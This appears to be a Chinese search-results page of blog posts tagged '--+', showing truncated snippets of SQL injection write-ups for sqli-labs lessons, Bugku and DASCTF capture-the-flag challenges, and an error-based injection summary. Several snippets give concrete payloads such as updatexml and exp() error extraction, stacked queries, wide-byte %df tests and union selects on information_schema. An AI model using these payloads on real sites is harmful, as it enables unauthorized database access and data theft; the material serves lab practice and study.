搜索结果
查询Tags标签: --+,共有 57条记录-
Sqli labs less 60
1.常规方法测试 2.根据错误信息判断闭合方式为")–+,并且为字符型注入 3.查看当前库 ?id=1") and updatexml(1,concat(0x7e,(database()),0x7e),1)--+ 4.查看库下的所有表88IVGFZVAY ?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_…
2021/9/26 19:11:22 人评论 次浏览 -
Sqli labs less 40
1.输入正确的参数,网页回显正常的信息。使用单引号闭合,网页无回显。 2.把后面的信息注释掉,网页仍然返回错误信息。测试以下所有语句,测试得出此处是单引号和括号闭合的字符型盲注。 3.堆叠注入?id=1);CREATE TABLE WhiteMoon LIKE users;--+ ?id=1);INSERT INTO W…
2021/9/14 19:05:34 人评论 次浏览 -
Sqli labs less 40
1.输入正确的参数,网页回显正常的信息。使用单引号闭合,网页无回显。 2.把后面的信息注释掉,网页仍然返回错误信息。测试以下所有语句,测试得出此处是单引号和括号闭合的字符型盲注。 3.堆叠注入?id=1);CREATE TABLE WhiteMoon LIKE users;--+ ?id=1);INSERT INTO W…
2021/9/14 19:05:34 人评论 次浏览 -
Sqli labs less 35
本less的考点是数值型注入 1.常规方法测试,提示无报错但1被转义 2.同上利用宽字符进行注释测试%df?id=1%df--+ ?id=1%df)--+ ?id=1%df))--+ ?id=1%df"--+ ?id=1%df")--+ ?id=1%df"))--+ 3.直接用 ORDER BY 排序,网页回显正常数据,确定是数值型注入…
2021/9/10 19:04:55 人评论 次浏览 -
Sqli labs less 35
本less的考点是数值型注入 1.常规方法测试,提示无报错但1被转义 2.同上利用宽字符进行注释测试%df?id=1%df--+ ?id=1%df)--+ ?id=1%df))--+ ?id=1%df"--+ ?id=1%df")--+ ?id=1%df"))--+ 3.直接用 ORDER BY 排序,网页回显正常数据,确定是数值型注入…
2021/9/10 19:04:55 人评论 次浏览 -
sql的报错注入总结
1.数据溢出 2.xpath语法错误 3.concat+rand()+group by 主键重复报错 4.几何函数1.数据 exp()函数:此函数返回e(自然对数的底)指数X的幂值 ,select 查询成功返回0, ~0=1111111111111111mysql> select exp(~(select*from(select user())x)); ERROR 1690 (22003): DOU…
2021/8/30 19:06:31 人评论 次浏览 -
sql的报错注入总结
1.数据溢出 2.xpath语法错误 3.concat+rand()+group by 主键重复报错 4.几何函数1.数据 exp()函数:此函数返回e(自然对数的底)指数X的幂值 ,select 查询成功返回0, ~0=1111111111111111mysql> select exp(~(select*from(select user())x)); ERROR 1690 (22003): DOU…
2021/8/30 19:06:31 人评论 次浏览 -
Bugku-13.成绩查询-简单sql注入
判断注入点类型 1 显示 1 不显示 2 and 1=1 显示2的结果,单引号无括号 判断字段数 1 order by 5--+ 不显示 1 order by 4--+显示,字段数为4 判断可用字段 -1 union select 1,2,3,4--+获取数据库获取表名 id=-1 union select 1,(select group_concat(table_name) from info…
2021/8/13 2:06:29 人评论 次浏览 -
Bugku-13.成绩查询-简单sql注入
判断注入点类型 1 显示 1 不显示 2 and 1=1 显示2的结果,单引号无括号 判断字段数 1 order by 5--+ 不显示 1 order by 4--+显示,字段数为4 判断可用字段 -1 union select 1,2,3,4--+获取数据库获取表名 id=-1 union select 1,(select group_concat(table_name) from info…
2021/8/13 2:06:29 人评论 次浏览 -
sqli-labs(58-61)-challenges-报错注入
58 5步内获得flag-报错注入-单引号 5步内获取flag?有点太高估我的能力了吧
2021/8/8 19:06:22 人评论 次浏览 -
sqli-labs(58-61)-challenges-报错注入
58 5步内获得flag-报错注入-单引号 5步内获取flag?有点太高估我的能力了吧
2021/8/8 19:06:22 人评论 次浏览 -
DASCTF 7月赛 - 安全,安全,还是xxx的安全(Writeup)
题目上来是买flag的,一开始我真的以为买flag给flag,联想到了逻辑漏洞,但是测试后发现线程十分安全(一旦多了就自断请求失败!),直接又通过url联想到了flask的SSTI,但是测试了后username参数过滤很严格,emmm陷入了沉思 直到Hint放出来才知道是SQL注入,az! CREATE T…
2021/8/2 6:08:35 人评论 次浏览 -
DASCTF 7月赛 - 安全,安全,还是xxx的安全(Writeup)
题目上来是买flag的,一开始我真的以为买flag给flag,联想到了逻辑漏洞,但是测试后发现线程十分安全(一旦多了就自断请求失败!),直接又通过url联想到了flask的SSTI,但是测试了后username参数过滤很严格,emmm陷入了沉思 直到Hint放出来才知道是SQL注入,az! CREATE T…
2021/8/2 6:08:35 人评论 次浏览 -
sqliab刷题笔记-联合注入
Less-1测试是字符型还是数字型判断所在字段数查看显示值可以看出显示2,3位置。因此我们选择2的位置进行联合注入查看表名我们要对admin,users等字符敏感查看admin表中的字段名显示内容获得flag:hellowordless-1的代码Less-2判断字符型注入还是数字型注入通过匹配单引号我…
2021/7/26 19:07:47 人评论 次浏览 -
sqliab刷题笔记-联合注入
Less-1测试是字符型还是数字型判断所在字段数查看显示值可以看出显示2,3位置。因此我们选择2的位置进行联合注入查看表名我们要对admin,users等字符敏感查看admin表中的字段名显示内容获得flag:hellowordless-1的代码Less-2判断字符型注入还是数字型注入通过匹配单引号我…
2021/7/26 19:07:47 人评论 次浏览
